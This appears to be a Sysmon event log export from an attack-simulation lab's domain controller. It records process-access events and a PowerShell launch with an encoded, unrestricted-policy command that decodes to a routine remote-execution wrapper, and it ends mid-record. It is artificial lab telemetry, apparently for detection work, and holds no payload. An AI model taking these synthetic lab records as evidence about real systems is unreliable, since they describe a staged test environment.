{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.625\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nProcessId: 4480\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nParentProcessId: 3556\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.625","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","ParentProcessId":"3556","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAE